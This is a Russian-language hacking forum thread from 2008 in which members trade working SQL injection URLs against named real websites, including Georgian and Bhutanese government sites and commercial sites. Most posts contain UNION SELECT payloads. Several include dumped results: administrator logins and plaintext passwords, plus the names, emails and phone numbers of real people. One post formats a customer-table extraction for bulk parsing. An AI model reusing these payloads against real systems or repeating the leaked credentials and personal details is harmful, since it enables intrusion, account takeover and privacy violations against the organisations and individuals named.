ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6151  
Старый 01.08.2008, 08:22
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Teatrdoc.ru - PR 5
Театр.DOC
Цитата:
http://www.teatrdoc.ru/plays.php?id=-1+union+select+1,2,version(),4,5/*
Novochgrad.ru - PR 3
Новочеркасск. Администрация Города.
Цитата:
http://www.novochgrad.ru/adm.php?id=-28+union+select+1,version(),3/*

Последний раз редактировалось sabe; 01.08.2008 в 08:31..
 
Ответить с цитированием

  #6152  
Старый 01.08.2008, 12:24
Аватар для Snap
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288

Репутация: 82
Отправить сообщение для Snap с помощью ICQ
По умолчанию

www.naec.ge
Examination Center provides Georgian

http://www.naec.ge/more.php?t=links.php&f=20&su=semassessmentland&rig _no=1&id=-86'+union+select+1,2,3,4,5,6,7,8,concat(username,c har(58),passwd),10,11+from+user+limit+0,1/*&lang=eng
xarebava:naecge

Login: xarebava
Pass: naecge
 
Ответить с цитированием

  #6153  
Старый 01.08.2008, 12:42
Аватар для Snap
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288

Репутация: 82
Отправить сообщение для Snap с помощью ICQ
По умолчанию

http://www.mes.gov.ge/
Ministry of education and science of Georgia

http://www.mes.gov.ge/index.php?module=calendar&month=07&year=2008&searc h_day=-14'+union+select+1,2,3,id,user,pass,7+from+gov_pas sword/*
http://www.mes.gov.ge/index.php?module=calendar&month=07&year=2008&searc h_day=-14'+union+select+1,2,3,concat(table_name,char(58), column_name,char(58),table_schema),5,6,7+from+info rmation_schema.columns/*

Login:mesarion
Pass: yvancha
 
Ответить с цитированием

  #6154  
Старый 01.08.2008, 17:57
Аватар для Buddah
Buddah
Новичок
Регистрация: 26.11.2007
Сообщений: 6
Провел на форуме:
80047

Репутация: 5
По умолчанию

Код:
http://www.sonybmgmusic.co.uk/artists/annie_lennox/-1/order+by+2/*
нашел сайт очень интересный)) у самого опыта мало, может кому тоже интересно будет
 
Ответить с цитированием

  #6155  
Старый 01.08.2008, 18:46
Аватар для Dr.Frank
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

dit.gov.bt - Pr5
Код:
http://www.dit.gov.bt/newsdetail.php?newsId=-44+union+select+11,22,concat(0x2020202020202020202020,user,0x3a,password),44+from+mysql.user--
 
Ответить с цитированием

  #6156  
Старый 01.08.2008, 19:16
Аватар для ILYAtirtir
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Код:
http://vehaauto.ru/catalog.php?id_article=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11/*&id_page=1 
4.0.27-max-log


Код:
http://www.cccp.de/humor/showitem.php?id=4+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5/*
4.0.15:web2@localhost:usr_web2_1


Код:
http://www.generalsemantics.org/inner.php?page=news&id=999999+union+select+1,2,version(),4/*
5.0.22

Код:
http://www.generalsemantics.org/inner.php?page=news&id=-9+union+select+1,2,3,table_name+from+information_schema.tables/*
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
tbl_adminusers
tbl_featured_products
tbl_mainpages
tbl_masterpages
tbl_news
tbl_quotes
tbl_subpages


Код:
http://www.generalsemantics.org/inner.php?page=news&id=-9+union+select+1,2,3,concat_ws(0x3a,UserName,LoginName,PassWord,email,phoneNo)+from+tbl_adminusers/*
Lance Strate:lstrate:heroes:lstrate@time-binding.org:201-921-4745
Marty Levinson:Marty:Fairytales:igs@timebinding.org:718-793-6621
nmtucson:nmtucson:justme:millerstwo@comcast.net:520-225-0476
Jennifer Clarke:jennifer:56375637:igs@time-binding.org:817-922-9950


Login Page http://www.generalsemantics.org/admin/login.php


Код:
http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,concat_ws(0x3a,version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
5.0.51a:admin@localhost

Код:
http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+limit+19,1
table_name=aut

Код:
http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.columns+where+table_name=0x617574+limit+1,1
columns_name=log,pass

Код:
http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,concat_ws(0x3a,log,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+aut+limit+0,1
lisa:lisa
dima:dima

Последний раз редактировалось ILYAtirtir; 01.08.2008 в 19:20..
 
Ответить с цитированием

  #6157  
Старый 01.08.2008, 19:29
Аватар для Buddah
Buddah
Новичок
Регистрация: 26.11.2007
Сообщений: 6
Провел на форуме:
80047

Репутация: 5
По умолчанию

база юзеров:

username
Код:
http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,username,null,null,null,null,null,null,null,null,null,null+from+users+where+1=1/*
password
Код:
http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,password,null,null,null,null,null,null,null,null,null,null+from+users+where+1=1/*
мыла
Код:
http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,email,null,null,null,null,null,null,null,null,null,null+from+users+where+1=1/*

таблицы
Код:
http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,column_name,null,null,null,null,null,null,null,null,null,null+from+information_schema.columns/*

подскажите как в данном слуаче найти вдминку? также не получилось узнать version() и database()
---------------
сорри тупанул
version() - 5.0.32-Debian_7etch5-log
database() - borodinmokaru

админку все еще не нашел

Последний раз редактировалось Buddah; 01.08.2008 в 19:44..
 
Ответить с цитированием

  #6158  
Старый 01.08.2008, 19:30
Аватар для Dr.Frank
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

worldrowing.com - Pr7
Код:
http://www.worldrowing.com/display/modules/media/media_detail.php?mediacenterid=-8+union+select+1,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+mysql.user+limit+0,1--&imgnum=13&mdatype=1&searchKwd=&searchFrom=&searchTo=&cat=&subcat=209&subcat2=&page=0
 
Ответить с цитированием

  #6159  
Старый 01.08.2008, 21:19
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
http://www.enterthevault.com/artist.php?id=-43+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,concat_ws(0x3a,us er(),database(),version()),44,45,46,47/*
version() - 4.1.20-LOG
user() - VAULT@LOCALHOST
database() - VAULT

Цитата:
http://www.sportsouthwest.co.uk/other.php?id=-167+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version()),5/*
version() - 4.1.20-log
user() - sportsouthuk@localhost
database() - sportsouthuk

Цитата:
http://www.roguegovernment.com/news.php?id=-4682+union+select+concat_ws(0x3a,user(),database() ,version()),2,3,4,5,6
version() - 4.1.22-standard
user() - roguegov_publicr@localhost
database() - roguegov_rgov
 
Ответить с цитированием

  #6160  
Старый 01.08.2008, 23:12
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

emspost.ru
VERSION() 4.1.22-log
DATABASE() emspost_1
USER() emspost_1@localhost
Версия 4, такчто всё подобрано руками

Сразу под парсер, разбивать по :::
Код:
http://emspost.ru/news/archive/?id=-1+UNION+SELECT+1,2,3,4,concat(0x3a3a3a,concat_ws(0x3a3a3a,id,name,company,email,city,address,phone,login,pwd),0x3a3a3a),6,7,8,9+FROM+ems_clients+LIMIT+0,1/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ